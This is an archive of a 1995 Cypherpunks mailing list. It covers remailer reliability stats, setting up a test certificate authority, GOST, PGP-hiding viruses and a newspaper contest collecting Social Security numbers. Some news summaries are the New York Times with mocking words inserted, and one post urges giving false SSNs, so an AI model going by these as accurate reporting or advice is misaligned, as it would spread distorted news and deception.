Rather, it might make certain currencies to all intents >and purposes disappear." Gresham's law says that the bad money drives the good money out of circulation. Does this mean that real cash is better than ecash ;-). Bill From an197098 at anon.penet.fi Mon Nov 27 01:37:25 1995 From: an197098 at anon.penet.fi (an197098 at anon.penet.fi) Date: Mon, 27 Nov 1995 17:37:25 +0800 Subject: spooky URL Message-ID: <9511270916.AA16235@anon.penet.fi> while visiting http://www.mcs.com/~candyman/http/boom.html, I noticed that my Netscape's status line mentions an attempt to connect to: g1.internet-audit.com a little spooky... any ideas what is happening?? I prefer e-mail. reply (anonymously) to an197098 at anon.penet.fi reply (NON-anonymously) to na197098 at anon.penet.fi --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From carolann at censored.org Mon Nov 27 02:22:37 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Mon, 27 Nov 1995 18:22:37 +0800 Subject: spooky URL Message-ID: <199511271012.DAA03786@mailhost1.primenet.com> Nothing spooky about it. They are an audit-sevice for web pages that is sponsored. Anytime you access a page this tell them you were accessed. Love Always, Carol Anne ps. you can get an acct. there if you want it. > >while visiting http://www.mcs.com/~candyman/http/boom.html, I noticed that my Netscape's status line mentions an attempt to connect to: > >g1.internet-audit.com > >a little spooky... any ideas what is happening?? > > >I prefer e-mail. 
>reply (anonymously) to an197098 at anon.penet.fi >reply (NON-anonymously) to na197098 at anon.penet.fi > > > > > > > > >--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** >Your e-mail reply to this message WILL be *automatically* ANONYMIZED. >Please, report inappropriate use to abuse at anon.penet.fi >For information (incl. non-anon reply) write to help at anon.penet.fi >If you have any problems, address them to admin at anon.penet.fi > > -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From jsw at netscape.com Mon Nov 27 03:20:22 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Mon, 27 Nov 1995 19:20:22 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: Message-ID: <30B99C34.2A1F@netscape.com> Alex Strasheim wrote: > > > Basicly when the browser finds a new CA that it does know about it promts > > the user and through a series of dialog boxes the user chooses to trust it > > or not. > > Is anyone running an ssl web server that would let us see how this works? A little bird pointed me toward https://www.secret.org. I have no idea who they are... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. 
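Carl Ellison's two points in the "establishing trust" message earlier in this archive (identify a key by a hash of the whole key rather than a portion of it, and keep a locally assigned alias file protected under your own key) can be sketched as follows. This is an added example, not code from the list, from PGP or from TIS/MOSS: the key bytes are constructed samples, SHA-256 and HMAC are assumed stand-ins for the hash and the protection a real tool would use, and every function and class name is hypothetical.

```python
"""Added example: identify keys by a hash of the whole key, and keep a
locally assigned, integrity-protected alias file (all names hypothetical)."""
import hashlib
import hmac
import json


def short_key_id(key_material: bytes) -> str:
    """Short ID from the trailing 8 bytes only, standing in for an ID that is
    'merely some portion of the modulus'. Cheap to display, not unique."""
    return key_material[-8:].hex().upper()


def fingerprint(key_material: bytes) -> str:
    """Identifier derived from every byte of the key (SHA-256 is an assumption)."""
    return hashlib.sha256(key_material).hexdigest()


class AliasStore:
    """Maps full fingerprints to names that only the local user assigns."""

    def __init__(self, secret: bytes):
        self.secret = secret   # the user's own conventional key
        self.aliases = {}      # fingerprint -> alias

    def assign(self, key_material: bytes, alias: str) -> None:
        fp = fingerprint(key_material)
        owner = next((f for f, a in self.aliases.items() if a == alias), None)
        if owner is not None and owner != fp:
            raise ValueError(f"alias {alias!r} already names a different key")
        self.aliases[fp] = alias

    def lookup(self, key_material: bytes):
        """Return the local alias for this exact key, or None if unknown."""
        return self.aliases.get(fingerprint(key_material))

    def dump(self) -> bytes:
        """Serialize the alias file with an HMAC tag over its contents."""
        body = json.dumps(self.aliases, sort_keys=True).encode()
        tag = hmac.new(self.secret, body, hashlib.sha256).hexdigest().encode()
        return tag + b"\n" + body

    @classmethod
    def load(cls, secret: bytes, blob: bytes) -> "AliasStore":
        """Reject the file unless the tag verifies under the user's secret."""
        tag, _, body = blob.partition(b"\n")
        expected = hmac.new(secret, body, hashlib.sha256).hexdigest().encode()
        if not hmac.compare_digest(tag, expected):
            raise ValueError("alias file failed integrity check")
        store = cls(secret)
        store.aliases = json.loads(body)
        return store


def linked(signer_key_a: bytes, signer_key_b: bytes) -> bool:
    """Two verified signatures are linked only if the verifying key is the same key."""
    return fingerprint(signer_key_a) == fingerprint(signer_key_b)


# Constructed sample key material (not real PGP keys): two different keys that
# share the same trailing 8 bytes and would carry the same claimed UserID.
KEY_KNOWN = bytes([0xC1]) * 56 + bytes.fromhex("0123456789abcdef")
KEY_OTHER = bytes([0xD7]) * 56 + bytes.fromhex("0123456789abcdef")

if __name__ == "__main__":
    store = AliasStore(secret=b"constructed local secret")
    store.assign(KEY_KNOWN, "greg")
    print("short IDs equal:", short_key_id(KEY_KNOWN) == short_key_id(KEY_OTHER))
    print("aliases:", store.lookup(KEY_KNOWN), store.lookup(KEY_OTHER))
    print("linked:", linked(KEY_KNOWN, KEY_KNOWN), linked(KEY_KNOWN, KEY_OTHER))
```

The short IDs of the two sample keys are identical, yet only the key the user actually assigned resolves to an alias, and an edited alias file is refused on load.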
From anonymous-remailer at shell.portal.com Mon Nov 27 06:29:17 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 27 Nov 1995 22:29:17 +0800 Subject: Register Message-ID: <199511271420.GAA26643@jobe.shell.portal.com> On 8 Mar 95 at 22:46, Robert East wrote: > Register > > I'd like to sign up for email > > Bob You got it, Bub! Er, Bob. From jya at pipeline.com Mon Nov 27 06:44:40 1995 From: jya at pipeline.com (John Young) Date: Mon, 27 Nov 1995 22:44:40 +0800 Subject: ETH_ic? Message-ID: <199511271435.JAA05550@pipe1.nyc.pipeline.com> 11-27-95. NYPaper: "An Intel computer security expert runs afoul of the law. So much for the 'hacker ethic'?" Regardless of whether one sees Randal Schwartz as a white knight with questionable judgment or a computer criminal who deserves jail time, his tale contains valuable lessons for anyone who uses or manages a corporate computer system. On the Internet, computer programmers and systems administrators have debated whether Mr. Schwartz was a hero or a criminal. The on-line jury is divided. Most concluded that he was guilty of poor judgment, not criminal intent. Some say the case has killed the hacker ethic. "If I saw someone on the Internet with a security weakness, at this point I would be reluctant to act the Good Samaritan and report it," said Jeffrey Kegler, an independent software consultant in Sunnyvale Calif. "If I saw weakness in Intel's machine, I'd keep it to myself." ETH_ic? (7 kb) From raph at CS.Berkeley.EDU Mon Nov 27 06:59:58 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 27 Nov 1995 22:59:58 +0800 Subject: List of reliable remailers Message-ID: <199511271450.GAA25350@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. 
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp hash ksub";
$remailer{"hroller"} = " cpunk pgp hash latent ek";
$remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"wmono"} = " cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = " cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = " cpunk mix pgp hash latent cut ek ksub";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.

Last update: Mon 27 Nov 95 6:46:42 PST

remailer  email address                      history        latency  uptime
-----------------------------------------------------------------------
hroller   hroller at c2.org                   +*#####---##     46:11  99.99%
robo      robo at c2.org                      + ####--*##      39:57  99.75%
amnesia   amnesia at chardos.connix.com       *+               39:12  99.66%
mix       mixmaster at remail.obscura.com     -- ---_.--.    6:36:54  99.37%
hacktic   remailer at utopia.hacktic.nl       +* **** ***       8:47  98.47%
replay    remailer at replay.com              +*. *** ***       6:20  98.31%
c2        remail at c2.org                    + ++++- +**    1:12:49  97.94%
ecafe     cpunk at remail.ecafe.org           +* .-- # ###     46:27  97.81%
flame     remailer at flame.alias.net         +* ** ***        17:41  97.50%
rmadillo  remailer at armadillo.com           ++ +++ +++       39:47  97.23%
portal    hfinney at shell.portal.com         +*#*# # *##        :28  96.79%
spook     remailer at valhalla.phoenix.net    ** *** ***       28:42  96.76%
alumni    hal at alumni.caltech.edu           + * +*            3:02  96.68%
wmono     wmono at valhalla.phoenix.net       * *** **         13:11  96.44%
vishnu    mixmaster at vishnu.alias.net       * *** * *         8:55  95.93%
extropia  remail at extropia.wimsey.com       ------- --     5:04:15  95.47%
penet     anon at anon.penet.fi               ---- -- -+     6:23:22  95.06%
ideath    remailer at ideath.goldenbear.com   -- - -_ .-    11:42:46  95.01%
bsu-cs    nowhere at bsu-cs.bsu.edu           * ## # #           :29  90.69%
rahul     homer at rahul.net                  +* +** +*-       21:04  98.77%
shinobi   remailer at shinobi.alias.net       + +*+            24:54  85.54%
ford      remailer at bi-node.zerberus.de     * +++ ++       6:56:02  80.39%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash
    Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.
special
    Accepts only pgp encrypted messages.
mix
    Can accept messages in Mixmaster format.
reord
    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon
    Remailer has been known to monitor contents of private email.
filter
    Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From jya at pipeline.com Mon Nov 27 07:00:06 1995
From: jya at pipeline.com (John Young)
Date: Mon, 27 Nov 1995 23:00:06 +0800
Subject: EXH_ume
Message-ID: <199511271450.JAA07253@pipe1.nyc.pipeline.com>

11-27-95. NYPaper, Lead story: "U.S. Will Deploy Its Spy Satellites on Nature Mission. A Huge Environmental Study Gives a New Lease on Life to Intelligence Systems."
The new program is directing spy satellites to study about 500 ecologically sensitive sites around the world. The data will be archived for future generations of scientists and will remain secret for now to conceal the abilities of the nation's reconnaissance systems. The monitoring effort is led by Medea, an avaricious group of about 60 scientists in academia and industry who advise the nation's intel clubhouses on the use of secret data to "study" the environment. The new reconnaissance effort is run for Medea by agony aunt NRO and is coordinated by dead-baby CIA. The program is very different from the related effort to mine old spy-satellite photos for environmental data, a wallet-rip the Clinton Administration recently began. So too, the program is different from recent intelligence gathering that studies natural phenomena for clues to ingenious tax milking. The Federation of American Scientists said the environmental reconnaissance was "potentially a watershed in the reform of intelligence," adding, "It reflects an expanding teat of national insecurity." EXH_ume (11 kb) From jk at digit.ee Mon Nov 27 08:37:11 1995 From: jk at digit.ee (Jyri Kaljundi) Date: Tue, 28 Nov 1995 00:37:11 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <30B99C34.2A1F@netscape.com> Message-ID: On Mon, 27 Nov 1995, Jeff Weinstein wrote: > Alex Strasheim wrote: > > > > > Basicly when the browser finds a new CA that it does know about it promts > > > the user and through a series of dialog boxes the user chooses to trust it > > > or not. > > > > Is anyone running an ssl web server that would let us see how this works? > > A little bird pointed me toward https://www.secret.org. I have no > idea who they are... Another way to see the dialog boxes is to delete one of the CA's that came with Netscape Navigator and then connect to for example https://www.netscape.com/ What software there is available (preferably non-commercial) to become a CA? 
Is for example the SSLeay package enough?

Jüri Kaljundi
jk at digit.ee
Digiturg http://www.digit.ee/

From sameer at c2.org Mon Nov 27 09:08:16 1995
From: sameer at c2.org (sameer)
Date: Tue, 28 Nov 1995 01:08:16 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <30B99C34.2A1F@netscape.com>
Message-ID: <199511271641.IAA21657@infinity.c2.org>

You can also snag the apache/ssl webserver and set one up for yourself, to see what it looks like. Non-commercial use only, as limited by the RSAREF license.

The SSL webserver on c2.org is "verisign blessed", so you can't use it for testing. (Hm, someone should think up a suitably derisive term of that..)

>
> Alex Strasheim wrote:
> >
> > > Basically when the browser finds a new CA that it does know about it prompts
> > > the user and through a series of dialog boxes the user chooses to trust it
> > > or not.
> >
> > Is anyone running an ssl web server that would let us see how this works?
>
> A little bird pointed me toward https://www.secret.org. I have no
> idea who they are...
>
> --Jeff
>
> --
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw at netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
>

--
sameer                                      Voice:   510-601-9777
Community ConneXion                         FAX:     510-601-9734
The Internet Privacy Provider               Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")    sameer at c2.org

From alex at proust.suba.com Mon Nov 27 09:11:16 1995
From: alex at proust.suba.com (Alex Strasheim)
Date: Tue, 28 Nov 1995 01:11:16 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <199511271654.KAA02460@proust.suba.com>

The Chicago Sun-Times is running a contest in which readers are asked to send in their social security numbers. Someone will win a cash prize after a random drawing.

I can't figure out the angle on this. If they simply want to run a promotional contest, why are they asking for ssn's? If there's an ulterior motive, what is it?
Are they going to sell the list? Would they have a use for it themselves?

The frustrating thing is that there are probably many millions of Americans who will give away the keys to the store for next to nothing. The feds probably made a tactical error: instead of trying to force mandatory key escrow down our throats, they ought to have offered everyone who is willing to submit to voluntary escrow a chance to win a Chrysler Minivan.

--
Alex Strasheim, alex at proust.suba.com

From norm at netcom.com Mon Nov 27 09:23:55 1995
From: norm at netcom.com (Norman Hardy)
Date: Tue, 28 Nov 1995 01:23:55 +0800
Subject: Elliptic curves, current status?
Message-ID:

At 9:48 PM 11/26/95, Wei Dai wrote:
....
>The IEEE p1363 group's working draft on elliptic curve standard may help
>you here. You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps
>
>One reason for confusion about the speed of elliptic curve cryptosystems is
>the small number of implementations. A paper in Crypto 95 claimed that
>for doing key exchange, an elliptic curve algorithm takes about the same
>time and has about the same level of security as DH with 512 bit modulus,
>and that elliptic curve has a speed advantage if greater security is
>desired.
>
>Wei Dai

Thanks much! I will look at the paper.

From harmon at tenet.edu Mon Nov 27 09:27:21 1995
From: harmon at tenet.edu (Dan Harmon)
Date: Tue, 28 Nov 1995 01:27:21 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
In-Reply-To: <199511271654.KAA02460@proust.suba.com>
Message-ID:

One reason for the ssn's is that it may be a LEA sponsored promo. If you are dumb enough to have a warrant or some other judgement against you and you give your ssn and address to a person or entity that you don't know then shame on you.

Dan

From eay at mincom.oz.au Mon Nov 27 09:39:42 1995
From: eay at mincom.oz.au (Eric Young)
Date: Tue, 28 Nov 1995 01:39:42 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To:
Message-ID:

On Mon, 27 Nov 1995, Jyri Kaljundi wrote:
> What software there is available (preferably non-commercial) to become a
> CA? Is for example the SSLeay package enough?

I'm just making a quick comment on this point. The current SSLeay setup, I would say no. You can do it but you need to write more stuff to do it correctly. It is a bit of an evil kludge. The next version should be able to do this (I hope, depending on time). The next version has (will have) several different ways to 'retrieve' certificates which can be added via a run time API (the application can 'push' new methods into the library during startup). I will probably not have time to put in a 'socket' based certificate server but it should be simple enough for this to be written by other people. It should also be simple enough for other people to write some routines that conform to the API so that the netscape DB files can be accessed by SSLeay (along with the current SSLeay 'hash directories' and the socket based lookup (if it gets put in)). The most important change is that I will support CRL if they are present and probably generate a 'warning' if there is no CRL. I still need to write a simple application to do a basic 'keep track of issued certificates' and generate a CRL if required. The library routines to write a CA are present, they just need to be glued to a simple database (which I will probably do in my demo case via ascii files in directories). This version will also hopefully support the concept of selecting a certificate/private key from a set of certificates, attempting to pick a certificate that is in the same 'tree' as another certificate.
This concept of multiple certificates for a person is useful for SSLtelnet, so that each 'host domain' can issue it's own certificates (and keep track of it's own CRL). To let some-one login, just issue them with a 'certificate' for that 'host domain'. eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From lharrison at mhv.net Mon Nov 27 09:51:27 1995 From: lharrison at mhv.net (Lynne L. Harrison) Date: Tue, 28 Nov 1995 01:51:27 +0800 Subject: [NOISE] Chi Sun Times SS# Sweepstakes Message-ID: <9511271738.AA28149@mhv.net> At 10:54 AM 11/27/95 -0600, Alex Strasheim wrote: >The Chicago Sun-Times is running a contest in which readers are asked to >send in their social security numbers. Someone will win a cash prize >after a random drawing. > >I can't figure out the angle on this. If they simply want to run a >promotional contest, why are they asking for ssn's? If there's an >ulterior motive, what is it? Are they going to sell the list? Would they >have a use for it themselves? Alex - There may be *an ulterior motive* of getting the person's ssn, i.e., for the purpose of the newspaper (and the winner) reporting winnings to IRS. In addition, the newspaper may also feel that, in selecting a 10-digit number, it probably will not repeat such as someone's birthdate. Personally, I lean towards the former. > >The frustrating thing is that there are probably many millions of >Americans who will give away the keys to the store for next to nothing. >The feds probably made a tactical error: instead of trying to force >mandatory key escrow down our throats, they ought to have offered everyone >who is willing to submit to voluntary escrow a chance to win a Chrysler >Minivan. I agree with you. I believe *greed* is the operating word.... Regards- Lynne ******************************************************* Lynne L. Harrison, Esq. 
| "The key to life: Poughkeepsie, New York | - Get up; E-mail: | - Survive; lharrison at mhv.net | - Go to bed." ******************************************************* From frantz at netcom.com Mon Nov 27 10:09:51 1995 From: frantz at netcom.com (Bill Frantz) Date: Tue, 28 Nov 1995 02:09:51 +0800 Subject: Virus attacks on PGP Message-ID: <199511270737.XAA20199@netcom16.netcom.com> At 11:40 11/26/95 -0800, Thomas E Zerucha wrote: >That woudl be interesting - even with the speaker "off" the power surge >causes clicking and other signs. Not to mention that the interrupt count >would start moving (of course the virus could replace the entire OS and >would only have to find 300K chunks to hide in). I looked at the memory usage on my 1meg Mac and 5meg is used for the system. I have no idea what it is all being used for. A lot can hide there. Bill Frantz From samman-ben at CS.YALE.EDU Mon Nov 27 10:29:09 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Tue, 28 Nov 1995 02:29:09 +0800 Subject: Cypherpunk Certification Authority (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 26 Nov 1995, Robert Hettinga wrote: > >Is this another one of those LD tentacles? ;) > > Must that or a spoof of somekind... "She" didn't sign it, and "she" claims > to have issued a signature... Methinks some of us need to read up on undeniable interactive signature systems. Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMLn/J75ALmeTVXAJAQGL5QL9HE+t0zKGVni03w4DvV2W1lj1807eaNRp xD4IJcEUJ+JVk4lUJQ+zNvOf81FMPG+0QNq9tqOEDNqiG9vemD7B8C7et5PH0pFb ktOeAw5WywsnwSeRleId1ukBktDdZR4v =QueN -----END PGP SIGNATURE----- From SADLER_C at HOSP.STANFORD.EDU Mon Nov 27 10:46:01 1995 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Tue, 28 Nov 1995 02:46:01 +0800 Subject: Encrypted Email Message-ID: Can anybody briefly summarize for me some options for encrypting email that are secure? 
I know about PGP but I need something for (my environment) with an easy to use interface (PC-Windows) - for use by people who really aren't very computer literate. Any ideas? Thanks! Connie From weld at l0pht.com Mon Nov 27 11:32:41 1995 From: weld at l0pht.com (Weld Pond) Date: Tue, 28 Nov 1995 03:32:41 +0800 Subject: [NOISE] Chi Sun Times SS# Sweepstakes Message-ID: "Lynne L. Harrison" : > There may be *an ulterior motive* of getting the person's ssn, i.e., for >the purpose of the newspaper (and the winner) reporting winnings to IRS. In >addition, the newspaper may also feel that, in selecting a 10-digit number, >it probably will not repeat such as someone's birthdate. Personally, I lean >towards the former. Why not just make giving up your SS# a condition of receiving the prize *if* you are a winner like lotteries do? I think the real reason is they need a unique number and are lazy and uncreative about generating one from the info people send in. Weld Pond - weld at l0pht.com - http://www.l0pht.com/~weld L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From raph at c2.org Mon Nov 27 11:33:05 1995 From: raph at c2.org (Raph Levien) Date: Tue, 28 Nov 1995 03:33:05 +0800 Subject: The future will be easy to use Message-ID: Here's a quote from Bill Gates' book: The mechanism that will make this possible is based on mathematical principles, including what are called "one-way functions" and "public-key encryption." These are quite advanced concepts, so I'm only going to touch on them. Keep in mind that regardless of how complicated the system is technically, it will be extremely easy for you to use. You'll just tell your information appliance what you want it to do and it will seem to happen effortlessly. 
(Thanks to the anonymous person who typed it in)

We may not all like Bill Gates, and some of us even boycott his software, but we must admit he is a very shrewd businessman and knows which side of his toast is buttered. I think this paragraph is right on the mark. The competition for which cryptographic protocol wins will be decided on the basis of usability.

The "dark forces" are no doubt aware of this fact, and have already made some advances in this area. One example is the Fortezza card. If cypherpunks are to have any hope of getting their vision of strong crypto implemented and deployed, it has to be in the context of usable systems.

From this perspective, let's take a look at the recent thread on "establishing trust." Carl Ellison advocates the MOSS alias system. My understanding of this system is that individual users associate "aliases" with public keys. If done right, it can work well. However, from a usability perspective, it is just one more trouble spot.

First, on what basis will users decide which keys are worthy of being assigned which aliases? Public keys are big hunks of base64 encoded gibberish. They are difficult to present in a user interface, difficult to communicate in alternate, known secure channels (such as telephone calls and face to face communication). There is no way that a person could memorize one.

The other issue is how much time and energy the user has to spend keeping the alias database up to date. There is no way to communicate securely with anyone who's not in the database. If the user is communicating with a large number of people, then it's very tempting to get sloppy.

There's no way around it. This kind of system will not make it in the big time. As I see it, any system that does must have the following properties:

* Some variant on the Web of Trust.
* Online key-servers for getting keys in real time.
* A clean mechanism for validating keys through alternate channels.
There are three possible outcomes: we build it, the NSA builds it, or Microsoft/Netscape builds it. This last outcome might not be so bad, but only in the first one can we rely on our principles being advanced.

Raph

From stewarts at ix.netcom.com Mon Nov 27 12:12:19 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 28 Nov 1995 04:12:19 +0800
Subject: GOST for sale
Message-ID: <199511271952.LAA26668@ix3.ix.netcom.com>

At 03:43 AM 11/24/95 +0100, Mats Bergstrom wrote:
>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe',
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Allegedly it uses 'GOST 28147-89',
>whatever that stands for.
>
>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

From what I've read of GOST, it's really a family of cyphers with different sets of S-boxes - routine military gets one set, top secret gets another, civilian govt another, etc. Aside from possible differences in security level for the S-boxes, one motivation is that you can't take civilian govt decryptors and use them to read or forge top secret military crypto, etc.

If this is correct, then some sets of S-boxes probably do have trapdoors (at least susceptibility to differential cryptanalysis); how good are the ones that Jetico is selling, what credentials do they have to convince us their cryptanalysis is good enough, and why are they doing parts of it in hardware?
#-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From stewarts at ix.netcom.com Mon Nov 27 12:14:42 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 28 Nov 1995 04:14:42 +0800 Subject: Cypherpunk Certification Authority Message-ID: <199511271952.LAA26633@ix3.ix.netcom.com> At 11:20 AM 11/25/95 -0800, you wrote: >At 01:53 AM 11/26/95 -0800, anonymous-remailer at shell.portal.com wrote: >>You'd rather sign before encryption?? >>Doesn't that give you "known plain-text" to attack? > >The signature is not known unless the whole message being signed is >known. Signatures often have known, or easily guessed, plaintext in them, like the signer's name or ID number, or various header fields such as X.509's equivalent to ----- BEGIN PGP .... >And any encryption scheme that is vulnerable to known plaintext attack >where only a part of the message is known, is worthless anyway. DES isn't worthless. It's a bit weak, but not worthless. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From adam at lighthouse.homeport.org Mon Nov 27 12:34:44 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 28 Nov 1995 04:34:44 +0800 Subject: [NOISE] Chi Sun Times SS# Sweepstakes In-Reply-To: <199511271654.KAA02460@proust.suba.com> Message-ID: <199511272026.PAA11253@homeport.org> Alex Strasheim wrote: | The Chicago Sun-Times is running a contest in which readers are asked to | send in their social security numbers. Someone will win a cash prize | after a random drawing. Sounds like a prime time to misremember your social security number. Alternately, transpose digits, make 6's and 8's indistinguishable, etc. Don't see it as oppression; see it as a prime chance to monkeywrench another database. 
Adam '119 36 3801' -- "It is seldom that liberty of any kind is lost all at once." -Hume From dl at hplyot.obspm.fr Mon Nov 27 12:39:16 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 28 Nov 1995 04:39:16 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: Message-ID: <9511272025.AA16830@hplyot.obspm.fr> Jeff Weinstein writes: > > Is anyone running an ssl web server that would let us see how this works? > > A little bird pointed me toward https://www.secret.org. I have no > idea who they are... For those that want to know what's there without wasting their time 'upgrading' to netscape 2.x,etc.... There is (currently?) very little, the only thing interesting I found is that 'they' claim to give away free CA if you mail at (their 'Project7'/'666 Crypto' route...) Regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept Marxist SEAL Team 6 jihad break mururoa explosion smuggle From zerucha at shell.portal.com Mon Nov 27 13:04:59 1995 From: zerucha at shell.portal.com (Thomas E Zerucha) Date: Tue, 28 Nov 1995 05:04:59 +0800 Subject: Virus attacks on PGP In-Reply-To: <199511270737.XAA20199@netcom16.netcom.com> Message-ID: On Sun, 26 Nov 1995, Bill Frantz wrote: > At 11:40 11/26/95 -0800, Thomas E Zerucha wrote: > >That would be interesting - even with the speaker "off" the power surge > >causes clicking and other signs. Not to mention that the interrupt count > >would start moving (of course the virus could replace the entire OS and > >would only have to find 300K chunks to hide in). > > I looked at the memory usage on my 1meg Mac and 5meg is used for the > system. I have no idea what it is all being used for. A lot can hide > there. > But it would also have to hide in something you load at boot time. For it to propagate there, it would have to make copies of itself. When crond and inetd and named all grow over 400K I get curious.
